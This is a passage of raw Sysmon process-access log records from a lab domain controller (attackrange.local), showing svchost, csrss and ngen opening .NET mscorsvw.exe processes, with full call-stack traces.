ystem32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007245Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.393{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45EF-6000-2103-000000009A01}4760C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007244Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.378{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-45EF-6000-2103-000000009A01}4760C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007243Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.378{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45EF-6000-2103-000000009A01}4760C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ef20|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2eb7b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ea88|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+11051|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+e075|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ae1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007242Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.362{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45EF-6000-2003-000000009A01}4620C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007241Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.346{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-45EF-6000-2003-000000009A01}4620C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007240Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.346{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45EF-6000-2003-000000009A01}4620C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ef20|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2eb7b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ea88|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+11051|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+e075|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ae1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007239Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.331{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45EF-6000-1F03-000000009A01}4352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007238Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.331{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-45EF-6000-1F03-000000009A01}4352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007237Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.331{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45EF-6000-1F03-000000009A01}4352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ef20|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2eb7b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ea88|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+11051|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+e075|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ae1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007236Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.315{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45EF-6000-1E03-000000009A01}4576C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007235Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.299{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-45EF-6000-1E03-000000009A01}4576C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007234Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.299{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45EF-6000-1E03-000000009A01}4576C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ef20|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2eb7b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ea88|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+11051|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+e075|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ae1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007233Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.284{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45EF-6000-1D03-000000009A01}4104C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007232Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.284{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-45EF-6000-1D03-000000009A01}4104C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007231Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.284{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45EF-6000-1D03-000000009A01}4104C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ef20|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2eb7b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ea88|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+11051|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+e075|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ae1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007230Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.268{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45EF-6000-1C03-000000009A01}4276C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007229Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.253{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-45EF-6000-1C03-000000009A01}4276C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007228Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.253{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45EF-6000-1C03-000000009A01}4276C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ef20|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2eb7b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ea88|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+11051|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+e075|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ae1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007227Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.237{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45EF-6000-1B03-000000009A01}4552C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007226Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.237{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-45EF-6000-1B03-000000009A01}4552C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007225Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.237{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45EF-6000-1B03-000000009A01}4552C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ef20|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2eb7b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2ea88|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+11051|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+e075|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ae1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007224Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.221{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45EF-6000-1A03-000000009A01}4804C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007223Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:59.206{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-45EF-6000-1A03-000000009A01}4804C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007222Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 